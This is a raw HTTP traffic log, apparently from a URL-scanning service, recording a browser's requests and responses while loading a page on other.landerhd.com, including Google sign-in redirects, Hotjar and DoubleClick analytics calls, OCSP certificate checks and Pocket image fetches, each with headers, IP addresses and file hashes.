set-cookie: __Host-GAPS=1:nm96wdEXf2sB6jdgB9vjIHL1lHuf:dZNyZn2uDH9NspXw;Path=/;Expires=Mon, 02-Sep-2024 02:55:15 GMT;Secure;HttpOnly;Priority=HIGH
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with very long lines (385)
Size:   394
Md5:    6654dd333e47e3fa1d5d1dec3e1cd619
Sha1:   9a088ff2921fe2fdc719d6e06cfee04a236ee05e
Sha256: 35bcddbc81f1ff5dae81431598ae724a2472e7e6aa029bd8e07415aa69203617
                                        
                                            GET /ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.google.com%2Ffavicon.ico&uilel=3&hl=en&service=mail HTTP/1.1 
Host: accounts.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.237
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
                                        
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Sat, 03 Sep 2022 02:55:15 GMT
location: https://accounts.google.com/v3/signin/identifier?dsh=S973727434%3A1662173715896780&continue=https%3A%2F%2Fwww.google.com%2Ffavicon.ico&hl=en&passive=true&service=mail&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQN2RmUFeefvQKpiBx-wI6f06q3ql5nx7HB-NZ9tBeRE3n45D2GNxjoVXEsVxkTdQL93ogG1Ey_pYw
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: script-src 'nonce-8JKe895gTSfna64s-lSjcg' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport, require-trusted-types-for 'script';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 390
server: GSE
set-cookie: __Host-GAPS=1:MKPhyi0mOohjcQbjiHROzi9plkfDpg:nKCjPLW7H0lIoML6;Path=/;Expires=Mon, 02-Sep-2024 02:55:15 GMT;Secure;HttpOnly;Priority=HIGH
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with very long lines (379)
Size:   390
Md5:    b192609d0f3ca29f5d7e3179168b7c12
Sha1:   305d03faecff2e712ebc663c4ce74c477462825e
Sha256: abb116ad57c4d794aa85f5f967f4d67d25aaa2dfd8cf8f3e11dae2709d2453e6
                                        
                                            GET /c/hotjar-2841648.js?sv=6 HTTP/1.1 
Host: static.hotjar.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.113
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
access-control-allow-origin: *
content-encoding: br
cross-origin-resource-policy: cross-origin
strict-transport-security: max-age=86400; includeSubDomains
x-cache-hit: 1
x-content-type-options: nosniff
date: Sat, 03 Sep 2022 02:55:15 GMT
cache-control: max-age=60
etag: W/4d9b30f9a9ee54b99baf24a8090bace2
vary: Accept-Encoding
x-cache: RefreshHit from cloudfront
via: 1.1 a2c3c8b833b34851dca4f7753ecaae58.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: OlzaCRjegBASAUin6XEGl2YIdHlhIjd2nZ7dPA7VK5om6SAKJTSTpA==
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (3790)
Size:   2735
Md5:    4ad0f401581a7a99b5c10857def6b778
Sha1:   de265aac61477e4d9889eb15a0f7a06a1a39b8b7
Sha256: 64dbb6966e871b27c3dbfc02f56ddcc8f9172aa4f800b5497f33e7a7251d1d05
                                        
                                            GET /v3/signin/identifier?dsh=S-1894852716%3A1662173715852221&continue=https%3A%2F%2Fwww.youtube.com%2Ffavicon.ico&hl=en&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQN2RmW9rJH5YUC-6E5LSVGZanyKywSleyyjxMdPTvnEgvYFigEtMJ6ab9qGOPpW7Ia20OUabu7L6w HTTP/1.1 
Host: accounts.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         216.58.207.237
HTTP/2 403 Forbidden
content-type: text/html; charset=utf-8
                                        
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Sat, 03 Sep 2022 02:55:15 GMT
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
strict-transport-security: max-age=31536000; includeSubDomains
report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi/external"}]}
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
content-security-policy: script-src 'nonce-xvWML3n3c8ilnTpNVRjaFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self', script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /v3/signin/_/AccountsSignInUi/cspreport/allowlist, require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
set-cookie: NID=511=pD9WzmdvSz2YVeQD5z0k_a55INga3yN-A-TvnRdfRqZwVsuyCQkBuElvoCA8_k-9m70vFKJT2f0TB8rpw-44zOClhQvhHl0rr0uzspwtWQxZV_OW5J2ElDyrG2jbq7L6k1lWWQ33yD_S_IQHaoo9KgPUthc2-6QljjH7HbDsWco; expires=Sun, 05-Mar-2023 02:55:15 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   66315
Md5:    61d1868b85d282afa94b4ffec8357a3b
Sha1:   4aa6a7f7caac5851f2fdad0f2a27f1e89da549f6
Sha256: 6f24a6f4e1fa627cc7eeacf5b93ffea3fa75b6a188282bd43de4478095fbf51c
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4446
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:41:09 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j96&tid=UA-165133312-2&cid=1946346750.1662173714&jid=1643252601&gjid=1264672244&_gid=2082388919.1662173714&_u=YEBAAEAAAAAAAC~&z=596860561 HTTP/1.1 
Host: stats.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
Content-Length: 0
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         173.194.221.155
HTTP/2 200 OK
content-type: text/plain
                                        
access-control-allow-origin: https://other.landerhd.com
strict-transport-security: max-age=10886400; includeSubDomains; preload
date: Sat, 03 Sep 2022 02:55:15 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
last-modified: Sun, 17 May 1998 03:00:00 GMT
access-control-allow-credentials: true
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 1
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  very short file (no magic)
Size:   1
Md5:    c4ca4238a0b923820dcc509a6f75849b
Sha1:   356a192b7913b04c54574d18c28d46e6395428ab
Sha256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
                                        
                                            GET /box-1ada912494ba7fc7aca15fcef1c2a7ae.html HTTP/1.1 
Host: vars.hotjar.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.118
HTTP/2 200 OK
content-type: text/html
                                        
content-length: 1044
date: Wed, 13 Jul 2022 08:33:06 GMT
accept-ranges: bytes
cache-control: max-age=31536000
content-encoding: br
cross-origin-embedder-policy: require-corp
cross-origin-resource-policy: cross-origin
etag: "0b3d3f4206ab84d8861a8cc4b2ddbe66"
last-modified: Wed, 13 Jul 2022 08:32:20 GMT
strict-transport-security: max-age=86400; includeSubDomains
x-robots-tag: none
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 095562e8748e634f880ee3c4ada2b6d0.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: QtRTZBvn9QnTAqAmF0_bzUj8LiQi9BUiBVWBoHjtWTcBH3JF2q4TjA==
age: 4472530
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2431), with no line terminators
Size:   1044
Md5:    0b3d3f4206ab84d8861a8cc4b2ddbe66
Sha1:   4561b7c0419b65db5c1314be2143bd1734e88d89
Sha256: ec42652b198c82469afbe5e6e69312a25425c1fd38d379cf3761b328ecd48e4a
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sat, 03 Sep 2022 02:55:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         143.204.42.165
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:16 GMT
Last-Modified: Sat, 03 Sep 2022 01:36:52 GMT
Server: ECS (nyb/1D0D)
X-Cache: Miss from cloudfront
Via: 1.1 b9f0050ca4d212d7c855e005be54b1ac.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 3PSwJZBC1nh70Yw-GnDA0bxEmHT0ZukVpAso1Gw-1U31ns2PGFFvzQ==
Age: 4704

                                        
                                            POST /api/v2/client/sites/2841648/visit-data?sv=6 HTTP/1.1 
Host: in.hotjar.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain; charset=UTF-8
Content-Length: 120
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.251.112.219
HTTP/2 200 OK
content-type: application/json
                                        
date: Sat, 03 Sep 2022 02:55:16 GMT
vary: Accept-Encoding
cache-control: no-cache, no-store
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-max-age: 86400
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   92
Md5:    e03464b4f14a1d296cb59883ae134e96
Sha1:   67e8cfe5f193093e715f15ed21b071dc13c8ee3d
Sha256: 51f23e4ba6b1a83ad7e297301a89147870b4c73952c3ae44d9ca7babb77d9955
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "87C27C4B0288F31FAA405BA5247767D1F299938551BD284212EE487DBB0DEB63"
Last-Modified: Fri, 02 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9243
Expires: Sat, 03 Sep 2022 05:29:19 GMT
Date: Sat, 03 Sep 2022 02:55:16 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "87C27C4B0288F31FAA405BA5247767D1F299938551BD284212EE487DBB0DEB63"
Last-Modified: Fri, 02 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9243
Expires: Sat, 03 Sep 2022 05:29:19 GMT
Date: Sat, 03 Sep 2022 02:55:16 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "87C27C4B0288F31FAA405BA5247767D1F299938551BD284212EE487DBB0DEB63"
Last-Modified: Fri, 02 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9243
Expires: Sat, 03 Sep 2022 05:29:19 GMT
Date: Sat, 03 Sep 2022 02:55:16 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "87C27C4B0288F31FAA405BA5247767D1F299938551BD284212EE487DBB0DEB63"
Last-Modified: Fri, 02 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9243
Expires: Sat, 03 Sep 2022 05:29:19 GMT
Date: Sat, 03 Sep 2022 02:55:16 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F93ac38e4-a58e-4303-b7a1-e6c19cc7f80e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7332
x-amzn-requestid: b4f35a34-c467-4582-9072-954573a77ff3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: XTiVBHorIAMF_Bg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63047db9-52dcb6600c9faf001774a655;Sampled=0
x-amzn-remapped-date: Tue, 23 Aug 2022 07:11:53 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 5yft4kr6Uo9C3m4xt0BoFRarcgJDT3bjQr_c2QPBsbyw4xL6Omos3g==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 ebe4011a81a36e2bf678f69ce1711330.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 09:53:01 GMT
age: 61335
etag: "72796327f9481a7516aac1fbfd73a36d69f83626"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7332
Md5:    8a1a9b226f6556f7ea2f3e990e618c78
Sha1:   72796327f9481a7516aac1fbfd73a36d69f83626
Sha256: 187b68b54b976b7a1a17928e172c9726b5583b650b982eb5cd2378a4ee2aa54d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe9669117-bdb7-4eca-9f0c-900e888a9a98.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 13241
x-amzn-requestid: 80083a05-9884-48f8-983b-d4132d7c8a0c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X2eMHFgPIAMF9qg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6312771a-16fd2f06541cb4bc027f153f;Sampled=0
x-amzn-remapped-date: Fri, 02 Sep 2022 21:35:22 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: sMzgVvKpAdIumqHzRtYOOYP1Yjy8oQzsn6PIo50kE_3NOlrdsCaohA==
via: 1.1 7f5e0d3b9ea85d0d75063a66c0ebc840.cloudfront.net (CloudFront), 1.1 73cb83fe6699afc2791b5c690c1ff8c6.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 21:49:44 GMT
age: 18332
etag: "087b7d14d84ebb179126c9dcd8964d22f24f30ab"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   13241
Md5:    d9ae49d397bc8300ce0eceda8175a3ad
Sha1:   087b7d14d84ebb179126c9dcd8964d22f24f30ab
Sha256: b9daa2fc390a97a4bd622dbdec7fe0fff7e6527ffb844a46b9b87b2bd6e0f006
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc55d0c73-4085-42ac-acb4-1ae9b2ffb393.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6976
x-amzn-requestid: da379546-9525-4e13-b9f0-a6446839df66
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X2eNeG7kIAMF4-Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63127722-37399f67565b06e7111095cd;Sampled=0
x-amzn-remapped-date: Fri, 02 Sep 2022 21:35:30 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: alcmiW5Cb3Z96RJNXfz4F54HNERbyV71Q8hqVuNEOTUc48kItzlfHQ==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 cd64decb1403270c914848213601a674.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 21:49:53 GMT
age: 18323
etag: "af3989072b658e2de119d006ae4ca1703468913d"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6976
Md5:    c199f7fc2a2857dec134bfdb2673e28c
Sha1:   af3989072b658e2de119d006ae4ca1703468913d
Sha256: e57411ba0221f6ffa7baf7c374ec790959a66d6a683fad40883ef01cf67e35c3
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff7d7b349-4711-4e66-bc42-888934e385a2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7501
x-amzn-requestid: bf297fc4-9164-45ee-bfab-06761a52e3ba
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X2eMJEP1IAMFdpA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6312771a-6b3e6416133d67a83d8a1469;Sampled=0
x-amzn-remapped-date: Fri, 02 Sep 2022 21:35:22 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: datd5eYK6nOAUdEpy_y4gcqsVmCqjP4qhzTnlJ9pSrquoYk2PPugTA==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 21:49:54 GMT
age: 18322
etag: "f3a3d835a37f9b23e7458f9b7bc721bc415b61cc"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7501
Md5:    23b580e2b673257d24b9c2e80c4c48ce
Sha1:   f3a3d835a37f9b23e7458f9b7bc721bc415b61cc
Sha256: c0e3559fde3dd08cdbd360f39dddcc98dd7c1b3aebd0861cc07105872a116d11
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F7dce7ca4-6ed1-4f00-8943-1ea59bc2cfd0.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11776
x-amzn-requestid: 59dcda55-4c16-4842-828d-2588c43178c5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
